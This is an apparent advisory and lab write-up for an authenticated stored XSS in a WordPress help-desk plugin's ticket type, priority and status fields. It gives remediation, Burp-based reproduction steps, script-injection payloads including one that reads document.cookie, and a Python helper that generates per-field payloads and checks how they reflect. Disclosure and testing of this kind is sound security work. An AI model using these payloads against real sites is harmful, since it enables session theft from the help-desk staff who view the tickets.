WordPress Advanced Ticket System < 1.0.64 — Authenticated Stored XSS in Ticket Metadata
Introduction
While reviewing help-desk and ticketing plugins for WordPress, I focused on how user-supplied ticket metadata is validated before being stored and rendered. These flows often accept multiple categorical fields that feel “safe” (type, priority, status), but if they are saved and later echoed without proper escaping, they become reliable vectors for stored cross-site scripting (XSS). My goal was to trace the submission lifecycle for these fields, confirm how the values are handled server-side, and validate the impact using a controlled proof-of-concept.
Summary of the Finding
The plugin fails to adequately sanitize and escape several ticket form fields before persisting and rendering them. As a result, an authenticated user with ticket-creation capability can inject script payloads into metadata fields (ticket type, priority and status). When the ticket is later viewed via its permalink, the payload executes in the browser of whoever views it, which in a help-desk workflow is typically the agent or administrator handling the ticket. This constitutes an authenticated stored XSS condition in versions prior to 1.0.64. Because these fields are categorical, the standard server-side fix is to validate each submitted value against the plugin's own set of allowed options when the ticket is saved and to escape the stored value for its output context when it is rendered (esc_attr() inside attributes, esc_html() in text); either control on its own is insufficient if the other path is missed.
Reproduction steps (tested on local instance)
Performed only on a local test instance for verification and learning.
- From the WordPress dashboard, go to Tickets → Add New, complete the title, content, and the metadata fields (Ticket type, Ticket priority, Ticket status), then save.
- Intercept the resulting request in Burp Suite and locate the parameters wats_select_ticket_type, wats_select_ticket_priority, and wats_select_ticket_status. These fields are stored and later rendered without adequate escaping, so each can be populated with a payload such as

    test"><script>alert('test')</script>

  or

    test"><script>alert(document.cookie)</script>

- Forward the modified request. To confirm execution, open the ticket's permalink; the injected script runs as soon as the page renders.
All of the parameters on the ticket's editing form are vulnerable in the same way; reloading the editing form page triggers the stored payload there as well.
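To make the confirmation step repeatable, the following Python script is an added example for this write-up, not code from the plugin or its author. It assumes the ticket has been submitted as described above but with a distinct marker per field instead of the same string in all three, and that the tester supplies the ticket permalink plus, if the ticket requires a login to view, the Cookie header copied from the Burp session. The parameter names come from the write-up; the marker scheme, the helper names and the sample page are constructed here. For each field it reports whether the value came back unescaped, entity-encoded, altered or absent, and for unescaped reflections whether it landed inside a tag (attribute context, where the leading "> in the payload is what breaks out) or in plain text (where the script tag alone would suffice).

```python
"""Classify how each ticket metadata field is reflected on a rendered ticket page.

Added example for this write-up; not code from the plugin or its author.
Workflow: run with no arguments to print one distinctive payload per field,
paste those into the intercepted request as described above, then run again
with the ticket permalink (and the logged-in Cookie header copied from Burp)
to see which fields came back unescaped and in which HTML context.
"""
import html
import sys
import urllib.request
from typing import Dict, Optional, Tuple

# Parameter names are taken from the write-up; the marker scheme is constructed here.
META_FIELDS = (
    "wats_select_ticket_type",
    "wats_select_ticket_priority",
    "wats_select_ticket_status",
)


def marker_for(field: str) -> str:
    """Per-field marker so the rendered page tells us which field leaked."""
    return f"xsscheck-{field}"


def payload_for(field: str) -> str:
    """The write-up's payload shape with a per-field marker.

    The leading "> closes an attribute value if the field is echoed inside a
    tag; the marker inside alert() keeps the script tag self-identifying.
    No ' or & is used, so PHP's esc_attr()/esc_html() and Python's html.escape()
    produce identical entity encodings for the comparison below.
    """
    m = marker_for(field)
    return f'{m}"><script>alert("{m}")</script>'


def reflection(page: str, field: str) -> str:
    """How the field's payload appears in the page.

    'unescaped' - the raw payload, script tag intact, is present
    'escaped'   - the payload is present but entity-encoded (safe)
    'altered'   - the marker survives but the payload was stripped or changed
    'absent'    - the marker does not appear at all
    """
    raw = payload_for(field)
    if raw in page:
        return "unescaped"
    if html.escape(raw, quote=True) in page:
        return "escaped"
    if marker_for(field) in page:
        return "altered"
    return "absent"


def context(page: str, field: str) -> Optional[str]:
    """For an unescaped reflection, 'attribute' if it sits inside a tag, else 'text'."""
    idx = page.find(payload_for(field))
    if idx < 0:
        return None
    before = page[:idx]
    # Inside a tag when the most recent '<' has not yet been closed by a '>'.
    return "attribute" if before.rfind("<") > before.rfind(">") else "text"


def audit(page: str) -> Dict[str, Tuple[str, Optional[str]]]:
    """Map every metadata field to (reflection, context)."""
    return {f: (reflection(page, f), context(page, f)) for f in META_FIELDS}


def fetch(url: str, cookie: Optional[str] = None) -> str:
    """GET the ticket permalink on the local test instance; pass the Cookie header if a login is needed."""
    req = urllib.request.Request(url, headers={"Cookie": cookie} if cookie else {})
    with urllib.request.urlopen(req) as resp:
        return resp.read().decode("utf-8", errors="replace")


# Constructed sample of a rendered ticket page (not captured from the plugin):
# type echoed raw inside an attribute, priority entity-encoded, status not shown.
SAMPLE_PAGE = (
    '<form><input name="wats_select_ticket_type" value="'
    + payload_for("wats_select_ticket_type")
    + '"><td>'
    + html.escape(payload_for("wats_select_ticket_priority"), quote=True)
    + "</td></form>"
)

if __name__ == "__main__":
    if len(sys.argv) < 2:
        for field in META_FIELDS:
            print(f"{field}: {payload_for(field)}")
        sys.exit(0)
    page = fetch(sys.argv[1], sys.argv[2] if len(sys.argv) > 2 else None)
    for field, (how, where) in audit(page).items():
        print(f"{field}: {how}" + (f" ({where} context)" if where else ""))
```

Distinct markers matter because the three values may be rendered in different places and contexts on the same page; with an identical string in every field a single alert tells you only that at least one of them is unescaped. The 'altered' result is the one to look at twice: it usually means a partial filter (for example a stripped script tag) that a different payload shape may still bypass, whereas 'escaped' means the output path is doing its job.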
Timelines
- Publicly Published : 2021-08-16
- Added : 2021-08-16
- Last Updated : 2021-08-16